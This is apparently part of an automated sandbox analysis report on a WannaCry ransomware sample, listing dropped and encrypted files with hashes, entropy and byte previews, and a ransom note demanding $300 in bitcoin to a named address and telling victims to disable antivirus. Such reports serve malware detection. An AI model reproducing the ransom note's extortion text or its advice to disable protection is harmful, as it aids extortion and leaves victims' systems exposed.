                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):602456
                                                  Entropy (8bit):7.999676947807036
                                                  Encrypted:true
                                                  SSDEEP:12288:DANNC3PG0r/8GT/mssi6rRaiy/0k2tHaUSgn/DRii/z4+9jUMvF:DANN4r/hTSiGRV5ptHPSQ/F5742UMvF
                                                  MD5:E457B2AD637896467E20E6E0945DBCE2
                                                  SHA1:4396593E84939AA3FA224F65FBDF69549B9A4C99
                                                  SHA-256:58C17538B6EFBCA5D6C8EA45A6805D87A20066C065A0EBB8AD7FC08B963AD024
                                                  SHA-512:9FD4B32A602F53E8E6E55FE36A087331EC0C0150B0403D1D648AEF6CF200AF645C4D7435330B7A56FF0DB931A6C2D7166FD81144413AC3B6F77DA5ADBCA521B5
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....{.i.B."....'...k..x..@...t.`t....p..hWE@.....y.WN.#.d..Fj.......$....4n2..?.hb..qs.%=.7V.....o.4>.S..q...pya.:..Q.s...}".......N]....-..y...^.....~.A>..Q.^.n.q..w0:......b^a.....=.X.B..F.W.K....`.%...6..z....g+../.v....t...vU.Z../.>6.*.....80......'S....g..k.H.|.h.3T.....w.9).t.w....{..D...oz..U.....L...5..m.....%.]......,.=..ZlV..4.....Et+....2..[+%.[$,.3..c..."uS.X".L-S.,.l3..v.Yq0.FU...`1'.#w...=.a...(..>...!..:.L.<...H.?.5zY.....7..\?..J...Y.6...4..(A.10..#..9..H.E....r..i..>6..VU..d.....3.#.?..hm..f.1..^Y..^.b.ER..p.../..z.[h........yM$[;<?....`z...W...f...':r$. DL4...I.......W....~.!O.lz.........j.N.k.....nj.....v.'..e.*.e;V^.R3."..<>.c.....A...v.g-..-,...*3\J>.`.P^~..*N.....&..=%.....,..T.gu{..u.2*...e..?ZSY...;U....:.>.}....&.0..FW......42.W.Q.*...5~.._.....".i%..R..n.p....1......h-_..A.$.hwKo%KR. e..Z....y..a,....p..5T(.SN.._.i..f..80b.B....t..H.c..4n..O....D..M...#%....n.6....T?2A.C.....8C.x..B]...4..7.).

                                                  C:\ProgramData\Microsoft\User Account Pictures\guest.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6344
                                                  Entropy (8bit):7.973953742796694
                                                  Encrypted:false
                                                  SSDEEP:96:oCxBP7n/eH3d3kiqDV9hbRh1lNMSg7VPruzZYzSskPbqTJMwB5zkIci0stwvjY:tx/edp8V9RplNMnPSzQSsS6MY5zkzH/k
                                                  MD5:631014F2F2901BE7A2AD2E4A1AEEA58B
                                                  SHA1:197AB0FE62A60BEAF3FC5FECB9BFA518CBF08A71
                                                  SHA-256:24F27A9B11B65F988385CFB2978F529441F0165E322C539E86449F0D2B7EE99D
                                                  SHA-512:28889176E0EF95CBA153FE2F269189B95E9B36284820F4D18BFEF6861C5850A1921A62FD4ED0133EE5769A646E4590EF0DA47FA228F02B02D46C1C6C17AF7A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......'V.Q.....e....G~r1.%.:...MF.nh~.....T...}.&Cn...:.(N.j.q{..Y../..t.O$.%T...K...+7..h..(....9.E.......oV. ~..F..r.#-z...nn.e;......Y.hA"...jH.BEooX.Q.C.H../.."y...1.U..9[|...N..d@N.....*L8gF...).-.B....i....."E....n.>O..>..ej..N!5*.w|\.G.Z...............-=..[.x.....~|.6.]`..6G0..BK..B[.rs....?.r..a.RmXj..S...qV..*....a.}.D.3!7.x.f.U.....N...D.?..%.q...*#+..4"...._..|z..yF.Mn........9...t...t....F.N.?...efOrD.f4...JS........8 \)......{..../..J.*3I..b..^.vU6.H...Q...:..{......E.53........1C....0`U.@O.+H.@..=*#.0}..P.]{9o.#..k.< .hC....Xe.....&....X.Kk.{...2..&."...w..]?i..9\..jO|..K..f...I..t.~..f...`.Z...&..oT.L.......<.s...HFf.I..H.q.L........P.Bp......zHiM..'..2........5qL.s.9.cp.e-2...1..:.C.;....W.j.o.......,]..Z..?.g?.=.%..c..khz\..w.X-..+.V/..T.F6.P.w.g.6.....G.^Z..*=(....{...""?....M.E....362....'.A..*..8?...(...2w......_...........N.4....5/..\r=.v..j..]...wN.?k..w.9..b.%a.60..qk@.12|..q...+.z..p5.[....H_..]...;...z..<.

                                                  C:\ProgramData\Microsoft\User Account Pictures\user-192.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2680
                                                  Entropy (8bit):7.930426485585328
                                                  Encrypted:false
                                                  SSDEEP:48:bk4ygMI0GbiMsrR7YjL3T6t7CP19s5/TWsIJ57Rj7Thhkvq56Ze6jPQmljrYSRHR:o4yb5MQ0Lg7g6/lIJ/jfhmq56Ze6jPQE
                                                  MD5:D2FFCCCC804893D41DF8FFF1DC5BB10C
                                                  SHA1:8BD29CEC592BD8D1A8D546CFFC9EA83B696A74F5
                                                  SHA-256:05642E82CDD0B7BAFE9CB38FFB86F7FB3263FB47054A5F49A39565DAA2FE6455
                                                  SHA-512:641D5EFA271B8FBA3CC26127B06AE9B354BD79FC3EC817BAF7EA48D5EBC34FAEA173F0EA5928B3BF4BD459414A3F0F91EB8E0730DC76B79C4E0F82C5D15B183E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......q.D.)......}...j.B.d.....Q......T...jD.&.}.,,~.&...Cd>.'O..5..Zvp.w#.Q....6..D... .4..5*Bge`]..X/...Rb.F....{...#6.+`.?v...?o!R,F.._j.A...<.F...}.\z....X..T..k.R..B.....vS..{RKd...-...do..=.Y.!-...LI.......Ll.#.)].....{x.|.h.|...<J.%...:.....X.........dk.g.Z.f.......oGD.2...H..KP.]T.B.+.......j>.....Q......p.j>.0............<".../...*u!..;T..7.YQ...f9...sc.~.y..j .;r6...[#6...-...C..+:....#.[..v.J..ue.....T.q.C.........#...<v.eB.'.>.c`.S..e4.....I. ./uV...S.tTO..bbW..)(8M'.[l....5{.@O...s........)...N...EOOg%<Q..I}.Y..z.!4N.7........5.@.I8.=._..IY.exsG.d.o.9..(..+..]e..e.]ix...Z.&..r...4.ID.r............|U2o.R3...........}...2QH.<K.U.ae__..XklrS1..f.f....}...>..;/.I.?.$<4....*.~.8<..1.a...S_.L.J..\..0.(%....XT....Vid..k6@.9m.c.|..m-.uX..P.z$..U.9....=^,@..d>y.+.!.s(e...`.8.I<.X.e..q8..<.$M..L......oi!..@..kK.....B.b...0,R.4W:...`.9Q....0.....R..mb.|<.Z...1D.[j,... .....y:...k.C7..qy......>...#........Qv./k~.........o.....^.L

                                                  C:\ProgramData\Microsoft\User Account Pictures\user-32.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):728
                                                  Entropy (8bit):7.6740853261315936
                                                  Encrypted:false
                                                  SSDEEP:12:bkEc7V2xyGhodYxUfD1Fx3MTXMj7HC06OOW9/zf5tc4P3Ti2wX+xCQlGJqz0Y6:bkJoyWefhL3MDMjZaW9/zf5FBQi4qzu
                                                  MD5:4CD1AA8F0328D3902A55D44C3488B256
                                                  SHA1:DA6D1E484C57FF70FD96FFD091C454834099DD64
                                                  SHA-256:A42C462AD513938AAE9E0C6E8E7EFD54A9554B2A88D3075DF109116328494AA9
                                                  SHA-512:A6DAB99704A2ECB11E117F40D005F074022122A29BF979B735A3AA77C92355AA5AAD9367384489DFF91BA69015D35F6F8E6DB0B886B5A1EDD491299A7724443A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....YH.70.....Z..6..M..$.........T".3z:$.@...+........*....U.,..8.e..P.....hp...%@.........}....2.'..$?...d2.J...j.....e%.E....L.P..../....bm.~..S.BN...).P&..H.......M....'.....i.]^'~w..C5.!.b.6...JF..F....g...[u.+....:.......4.....<.J...h.h..;.............R..../.o...n..........c.....;.g..PW..A...X....wc.1.N.Y..`....R.^v...z.W.....E.9.(....q@...*...=..-hY........F>y...5.....{E........t\.....^J..`.f..M...>p...u...C+....R..)..QJ,..W.y.F<....M..(..9..:.P.....6.....,ZX.......o.z.-.e..`.[..aV<..)v.M......F'.....I. .6.3g...M.x.h^..R*.f...l....IN..^.8.At@.....*...:.].8...|.....g..#.......8....A|.j.!W.%.o'.......(F8.L.r"..8&....M.:.g.....GH.zO>..z.:.........E...+.W!.... ....Av.

                                                  C:\ProgramData\Microsoft\User Account Pictures\user-40.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):808
                                                  Entropy (8bit):7.724961017358963
                                                  Encrypted:false
                                                  SSDEEP:24:bk9eZPo6UjkM0EleoI1V/V4RvjQsB1DglX9:bk9+thRoI1H4RlgN9
                                                  MD5:4622ADDE8F2867BFC9BA4084891D898A
                                                  SHA1:2C040542A299140255C6EECA51A36AA8EAE7AEB5
                                                  SHA-256:04035D41B1E582D461B408595BB562775F92406980F0836D3B5F89039241D8C8
                                                  SHA-512:6EECA597D4274EFBBA1063D33169D8D0F9507D5B00BFC7EC17BD55999CAC2E15DA1B9701CB74637778F98524C05B4B58AC7D5C45DDC86E6E1934909A9A490A65
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....,a......-..m.&....l....OeFs.[.....11..".J..V;K3-...;|%.5....}[Vo......$..,..C......zj..@..cM.>`./..AeYR.....b..4../...=tI}).....C.Z.v...p.(......u.'.UB..{._Nf.m......%...K.lt..<G..;.}.D....@.p....~..f...^....m.`.>v.|..|LN...../..... vJ.k.Q.{.d.............D#.Bt......~.b^J.....|J.j.....1.k.r$E`E..^...t.'...m...U:...m..>..LUe..9.];..I\.l.T...v...D..)=.@..1nG..YN?....d..J....q..%.....\.....Q-IK..Z.}(Q..6.x....P......HU[.|zd.....K..O..W.8.<.mv.q..p$..$-.n.~.f..gy..O}..E.@.?(..C.....`n......J....C".6.53M...L..Oc..|.w.7'.......V..a....T...@....C7....>H...,.J.e...A....Uy.......H+."N....aa..2.ycU.".../nb.....}.,v+.i0.j...I.5pvc.M.(k..i.6..m$E....h.A.....Una(L.z4:o.QL....k..Ku..}.....%Gu........>....W$r..Ql.[.0..<..z.*y..e}).>.......L.L..kA...B<.....G......k)

                                                  C:\ProgramData\Microsoft\User Account Pictures\user-48.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):904
                                                  Entropy (8bit):7.774816263615113
                                                  Encrypted:false
                                                  SSDEEP:24:bknze8MXnSjapvp5liTEnIEhu2kubvVz4jbXMPK3//oONED:bknz7KnSyiTAutube3MyXoeED
                                                  MD5:2B384C311597694DD9EAAC7D0ED64C66
                                                  SHA1:257DB3D6678857F3C4A144D8AF7541ABFECD5FD6
                                                  SHA-256:EAEC6F687FE4C3E7786B97A17B237BF0BFAB7EE69220CE7EB638501E33D9C361
                                                  SHA-512:64E36CED11FDB88356EE684F45F28BD352BEC2ACD0545126857CC8A0771883A8EADC48F7044E4D7AA552AF0D66150FA174A3B9851A987D11FA7CFFBBFBA0EF6C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......z....hbo.of..f.b.rh...t..d....k"v.E........d.V..tU.G.'HP....).C.6M}2.<....<.P....vr..G.=.S:"..[+.S......K.^4...O....+..sp..#..N6*.........t....EYY.N......._M.#.|nR.....k.......f{4P.=lD...?..L.p.]g4..o..@....`@.42-..5...,........O.Q-.*g...w8.<.0*....i........7...F...j e.o..>...Vp.w....U...~..X\w..R...+..4F.B...Cx..s.....%.].[+.5.o7.Z.......PM.........(.wb.^..0khH.:.......Q.6e.).....?!.ZB.).v....c.;.C..K.......(&...+.!z[Y0Z.lb.....[&;...........aG.!T.IF.......5....h.@.......q$...p6....{.D[fj.?=..;.A..M.,.hI^B...4.p..HK.[;$.=....2_..kJ?7.....k.!..[R7.!MO.M....U..Rf.p%m.....k......Z3.{Re)...5...j./..".........,..>..O.....E........p.l,.D'......Qg9t..qh......g.F.0....o.*.~<.z.c.^.Uk..P3.H.".J.....D.gx+..C.}-}Xu_.r........V..=q_....u#.L..@....51......a...;>.........'.......z...<.Z.NE{..a.#H..Lr.N6.).<.R...|4Y...<....m..d..d.4.....2s1.

                                                  C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):602456
                                                  Entropy (8bit):7.999716794662296
                                                  Encrypted:true
                                                  SSDEEP:12288:8KJ50EAA9WKmCLRI7ky2CKA6LW8EGkl9QomSI1VhHPN1d+BPz:Z0zKmCLPW1odhHPNA
                                                  MD5:D58E1A87274A7AB2168787154E1D5972
                                                  SHA1:1B9E274305787FA51031EEDCEDD4528C02B977E0
                                                  SHA-256:F4B19F40A8E16C9029DB1C7CEFDC2DEC68A0EDDC7FD6782915839113C7DC8DA8
                                                  SHA-512:814CE6554C9586EF80D1049BA3352065F788224161E8366948FB322E1A7A3BECC7CD9EE23DF15F49D776123A719B5CAEFC6D91E08B4FD6B408AADE69E1611647
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........Y...O..i..b.Qp.h..7..Z......*...Xu(g+...Kg;..^."-.)..3..........".F.."....z.3/.}...uT...p...C.})'f...D..(U.e;..9.......&r...&.M..rF.c\.BE.g.K.9....cm0[..}..D.#.'..p._..k.n.. ...u....>......7...N..r.yL.._../.S.C.?.Y....5...T..Wy......7....;l.....80............|....mV..jBD.vC.UX_.z...|.R.....x..r.)....$..@............nK..X.".I..s..R^.#...O.........TJ.f=n..~|.@]O.......h.U....R!Q....B<..+.../0e.~g.r..BnmE...f....X..V0.....O"...q.s&..N..."$BT.z.].q........7.y...{@..e{.q.H_#...9.h..2q....a(.I."......~..B........Nf.."..q..V...d.N...S..i..J..G.. ....7.C..V.2._.U..c...cwLf/h.av.#..4....;.a=f........o...4..YR.....s..L.....)..[.5..8....vt......B...Q3..~...Q&..Fx..j..z.r....Z..Q..M...........t.rXa.)Ow.,'...(..v..e..f...4....Z.B....^..3..7... .......F..i...K..?.^SQ...&.Na..L.jvkC..".`P?+.D.i<..._..I..o. .........~..4..........h....@...c^'.g.i.SD`t).g....o........J..':mE..8.e.<..L@......:...H.Ag. ..9..:.j.aD..F..8eC,.kP^e..'<....z..n....^

                                                  C:\ProgramData\Microsoft\User Account Pictures\user.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6344
                                                  Entropy (8bit):7.972882398881123
                                                  Encrypted:false
                                                  SSDEEP:96:o0FhqT97cd2iUwWJSV7R3YM2Wmh+IC2gMj7sY04MCjRQyGlv6Ni2XBvVx:1TdGwWJw9YhWvZ4sY04dljMAiKVx
                                                  MD5:3E4BCB3C5070AFCD95251DF476CC7945
                                                  SHA1:04226B583D2A138D9AA007BF51F4C7825E2F8364
                                                  SHA-256:01FE0E360E3F024A31D6EFB91208D088743DA441D8A6C64CD84B7A48FFB74129
                                                  SHA-512:9B7D9858A10D6281C32020EE822ED1B0825FF9136D21594D929107ABA2A5C3FBF23CB51C612B3582D068638BA299A5ED8C7821178484D5330EBFCC93D929DF63
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....{....."...b;q.z.5.....We....Z7...?.Y.....9.Sq.....z.......V.T9..y.N..?..NSq..o..K...)[..^2.....[..=b.XG....._WY...W.S.....8G..1,.Q..$V.....ue..D...*I..S.:GB!......P....}.{b.d-.i..^.Lov....../...o(.z.Q.|A.78....A...|>.....]KE....6F..p6x%I(.ZT.....g...............Q...k..'..Aa.I..z...n......3.;<..=*..]y.Ll.^ ....T.[..o.O2..A>..O...}...j...8.-.....0...R..~...v.Q..ix,L.`.v..i.5....|c..S.....e....}...c.uW.....D.....1>@...$.T.l.O...;....&....B...^s..F.......y..3b..,.....P.....d.8L......E..\n+..b.Mv..y.@....jO.........B..7.r.[..). ........Rj.V..b..m.*1...{T.;*....*.]Q[...~.}....^......../..'.%......Crlm..{.n.Lu.$}...........U.....O.....]:...e......7<?...&.k.-'...'....GV....O.L.p.R.....TP..z...y...fO.....S/.fN.......sc!5b..,..[....lW@...*.t ..X/.W..<U.8....-.4...a.[8.......W<...G.[.\....a.Wy&R.. ...ID...4....w..T..,.A.6. .{....M2J$..z'V.~o.>w.Bh.....&.x....;l. o.S...d....Q.k&.\d.......f4k0<..Vm X...d.r......kb..z..?..r...m.s.a.....x./@..

                                                  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.9749428884531035
                                                  Encrypted:false
                                                  SSDEEP:192:i4XL0DrCpeo5X7o3ACvi5T2VFL27jDuX4VakDEcYi5HdEil:nLcrFo4te5WgakA+tdL
                                                  MD5:D67377256B59EB0626833F7C24028696
                                                  SHA1:EB90AA6A2F7A0B5AA2FEEFAD93AA0C6ED8871D76
                                                  SHA-256:21CC8B780380BD9A08855182DC4BEE40FBE492669A8EB1737BCBBE33D45950D6
                                                  SHA-512:118A991464663E655094232DE025D2716B42FE42C15C1D05A1A9F1A9D5399B7569CBF8F67E7ED60371DE6783AEF0C427517BA4B99D75A382219BF4E593A2A0E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....uTl..=&.@.xo.F....j%\+f.d....8l..iY.t._....y.!PMz9.g}..(W%..K....O.*=...K.#.>w9..5.p....&.F... iaD.C.d...?<c.....`|...X7..Q..z.n...{..J...(q..iA....c!X>..d.o>..s.7 ....c..e.%......+...,....{..Z.Se..b..!......u.....7..o.e.."..B.*...d6.+.h.MW...R.......=.......~.....!.\.t.hx......72..(g"B...S....>..Z8`$.Adl...X....Bp.j.Sqm.....N.yN .{.$G.O.......W5...6K.../....;..~e#...O.O.M..../..........}.6....r.....s..ft......_)..3.&....!.k8W.z..(.})Z.U..X.U.. o..B[../?5.........x.L...C....r.}..'....Uxf[/jj.6r..o43|.`.Wx.e..eqO.Z.->..pG.=EpC...am....VX.6..(.n.w.u.Mr%."..0b.u!.k..G.S..~..9+..+....7K1qP|.8..q.g..:T.e.".'..l...T?.o.......?..2t.=U.....A.%k.....l&..........0...}.V.A...s..}...[.8.+/.C.upw.....<...h..?N..SytHPMMz.9)k..oIN.VC.......6...,.I~u..Z....=~j......y.=..h.j.Z...S...'..<.h..a.....0..u.....W...E".^.1T..Q.pIfH..K`..".o.v..t1m.l........QYeTou..+.+.H.XA.."..'=.Q@.I.tb...ZfO#.Gy..L..:r..V(m*.. &=.@...(b6...Z..x.../.Fog.

                                                  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.974913211664829
                                                  Encrypted:false
                                                  SSDEEP:192:Em5wB/N0gHfSZi0kXCVviIHiNoWjpWbJnYY:xuKg/Sg0WCpTCaJnYY
                                                  MD5:809F1A2208D4617FE328F5EA8FFBD170
                                                  SHA1:D4A4C7580C857AA6AF4D6F938B98F601487329C6
                                                  SHA-256:230384FD2C517502716369F0AD2D6F9243F97F47221529DF16D7BE0F9D222D97
                                                  SHA-512:93A09572A5A78D9BF17A01A2B1B315DCD32F6FE64BDF46A979AE24AB9CB28078C402B89CF99778E0B60220A6AAE89173495D3C439E7045EF3FC25A8ABBE538D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....*..X...t2.qog...]...#..~.4.pi.y.(L.^l.....7..7."......@w.d.n\.D....]..g.....H.e.P....TeN.R..B.J...*`.=..B._.$..g...k.(-7....x....D...._....O......P4.....(....P7.}"ra..4.q.`..0eA.f.zhup.$..1kMR;..F...V.....U...)....9x0..w.....hH.,U..-.4sXo`....Kz....=........Q...C.....s....h..C......}.g.dn..a.)|.mD2~.C.7:\.o.w2.E..b."...v.....V..B...<.9..\"...`.....A.Z$...w....u.G.....]......V.<Q?..u.{W..gC...y.qX...3......!....*.%A./6..!.-. .Xr+..Q....cfkg..jm.J1d..F~...sv.o@.D..o..T...,4@T.R....N.I....F'/....T9.....8NLqO.(.|R.>N.....;D.q..N5a'..+x,..T.K^`.6.?7w.^A..r.;......,....z.....Y.O.^3....E..?......Ec ...\..^.23...6..%}..:......-\../....).._..k.X1...pu..dum....G....`]8.....].e.......%..* .H...AM$..s....lri..6.j#..kR..XS..Y".).'..k.0.....4.,...K.v....%.!.....T.A--..6..7.JB.a.......q9.:.I+Cz.B.!..5.....6...$....N.x/.4..2.Y.z...+.......h-.`?.....C...6....a.......5G:.i......k....."..Q@$F.2.o.fr.2.*....g/_sJ...).o.-....D.N...T..W.-..s..7.N.h.

                                                  C:\ProgramData\Microsoft\Windows Defender\Scans\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Windows Defender\Scans\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):917784
                                                  Entropy (8bit):7.999786599525017
                                                  Encrypted:true
                                                  SSDEEP:24576:Se3EOiQGzlr2I40E+V4n8RM3Y+SDZduyjB1zKDaA42v:zEOqRE44ntYrQYB1zr9m
                                                  MD5:D668708F1B2DB3A63B1A474479183B9B
                                                  SHA1:EA32B396A06ED0D285372EF52DC8BD05DF1AD9E4
                                                  SHA-256:10DDF8EE5E757ACF3A2D4A7848179AAA808ABF83A539BB63A8BB7EBDB9BEF91D
                                                  SHA-512:E0D062D4259BDB78A54BF1CEB7AC3CFD8E08F86AF3C0AC1F5E5921786196541BBD4627CADF1B49935629CF52D38945C82C56024907DAF07188BAA0975BB808B0
                                                  Malicious:true
                                                  Reputation:unknown
